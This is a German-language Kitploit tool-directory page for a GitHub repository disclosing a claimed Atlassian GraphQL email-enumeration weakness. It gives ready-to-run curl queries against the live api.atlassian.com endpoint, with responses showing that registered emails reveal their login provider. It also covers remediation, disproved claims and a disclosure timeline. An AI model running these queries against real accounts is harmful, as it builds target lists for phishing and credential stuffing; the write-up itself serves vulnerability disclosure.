Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-XXXX-atlassian-email-enumeration — CVE-2026-XXXX: Atlassian GraphQL E-Mail Enumeration Oracle (CWE-204, CVSS 5.3 MEDIUM) | Kitploit
Tools/GitHubGitHub/wh4l3x/cve-2026-xxxx-atlassian-email-enumeration
OSINT (Open-Source-Intelligence)Phishing-ToolsAufklärungSchwachstellenanalyseInformationsbeschaffungWebsicherheitSocial EngineeringE-Mail-Sammlung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
wh4l3x/cve-2026-xxxx-atlassian-email-enumeration

CVE-2026-XXXX-atlassian-email-enumeration

CVE-2026-XXXX: Atlassian GraphQL E-Mail Enumeration Oracle (CWE-204, CVSS 5.3 MEDIUM)

Repository anzeigen
16vor 2 MonatenNoch nicht geprüft

CVE-2026-XXXX: Atlassian Central GraphQL — E-Mail-Enumeration-Orakel

Produkt

Atlassian Central GraphQL Gateway (api.atlassian.com/graphql)

Schwachstellentyp

CWE-204: Erkennbare Antwortunterschiede — E-Mail-Enumeration-Orakel

Schweregrad

MITTEL — CVSS 5.3 AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Beschreibung

Die GraphQL-Abfrage loomUnauthenticated_primaryAuthTypeForEmail auf dem zentralen GraphQL-Gateway von Atlassian gibt je nachdem, ob eine E-Mail-Adresse bei Atlassian registriert ist, unterschiedliche Antworten zurück, was eine nicht authentifizierte Benutzer-Enumeration ermöglicht.

Registrierte E-Mail → gibt authType (z. B. workos, password, google) und eine Weiterleitungs-URI zurück Nicht registrierte E-Mail → gibt authType: "none" ohne Weiterleitungs-URI zurück

Es ist keine Authentifizierung erforderlich. Der Abfragename enthält „Unauthenticated" – sie ist absichtlich öffentlich, sollte aber nicht preisgeben, ob eine beliebige E-Mail ein Atlassian-Konto hat.

Betroffene Versionen

  • Atlassian Central GraphQL Gateway (snapshot 37157, build 2026-07-02)
  • Endpunkt: https://api.atlassian.com/graphql

Proof of Concept

Registrierte E-Mail (gibt Authentifizierungsanbieter zurück):

root@kitploit:~
curl -s "https://api.atlassian.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType hasActiveMemberships redirectUri } }"}'

Antwort:

root@kitploit:~
{
  "data": {
    "loomUnauthenticated_primaryAuthTypeForEmail": {
      "authType": "workos",
      "hasActiveMemberships": false,
      "redirectUri": "https://www.loom.com/api/auth/workos?email=admin%40atlassian.com"
    }
  }
}

Nicht registrierte E-Mail (gibt „none" zurück):

root@kitploit:~
curl -s "https://api.atlassian.com/graphql" \
  -H "Content-Type: application/json" \
  -d '{"query":"query Test { loomUnauthenticated_primaryAuthTypeForEmail(email: \"[email protected]\") { authType } }"}'

Antwort:

root@kitploit:~
{
  "data": {
    "loomUnauthenticated_primaryAuthTypeForEmail": {
      "authType": "none"
    }
  }
}

Leckt ebenfalls: E-Mail → Authentifizierungsanbieter-Zuordnung

authType: "workos" bestätigt, dass die E-Mail WorkOS SSO verwendet. authType: "google" oder authType: "password" würden die Authentifizierungsmethode preisgeben. Dies ermöglicht gezieltes Phishing.

Auswirkungen

Ein nicht authentifizierter Angreifer kann:

  • Registrierte Atlassian/Loom-Konten in großem Umfang enumerieren
  • E-Mails ihrem Authentifizierungsanbieter zuordnen (Google SSO, WorkOS, Passwort)
  • Authentifizierungsanbieter-Informationen für gezielte Phishing-Kampagnen nutzen
  • Listen gültiger Atlassian-Benutzer für Credential-Stuffing erstellen

Ursache

Die Abfrage loomUnauthenticated_primaryAuthTypeForEmail führt keine Ratenbegrenzung durch und gibt für jede E-Mail ohne Authentifizierung Informationen zum Authentifizierungsanbieter zurück. Obwohl der Endpunkt absichtlich nicht authentifiziert ist (für den Anmeldevorgang von Loom), gibt er preis, ob eine E-Mail ein Konto hat und welchen Authentifizierungsanbieter sie verwendet.

Behebung

  1. Ratenbegrenzung hinzufügen, um Massen-Enumeration zu verhindern
  2. Einheitliche Antwort für sowohl registrierte als auch nicht registrierte E-Mails zurückgeben
  3. ODER: Vor der Abfrage des E-Mail-Status ein CAPTCHA/Nonce verlangen

Was dies NICHT ist

Nach gründlichen Tests wurden diese Behauptungen widerlegt:

  • ❌ Kein JWT-Token mit Berechtigungen (Tokens haben aaid: "unidentified")
  • ❌ Keine Admin-Mutationsausführung (alle schlagen mit ValidationError fehl)
  • ❌ Keine Authentifizierungsumgehung (Gateway identifiziert Aufrufer korrekt als unidentified)
  • ❌ Keine Datenlecks über die E-Mail-/Auth-Anbieter-Zuordnung hinaus

Zeitlicher Ablauf

  • 2026-06-30: Entdeckt
  • 2026-06-30: Gemeldet an [email protected]
  • 2026-07-02: Korrigierte Bewertung – von Kritisch (9.8) auf Mittel (5.3) herabgestuft

Entdeckt von

Wh4l3X

Tool herunterladen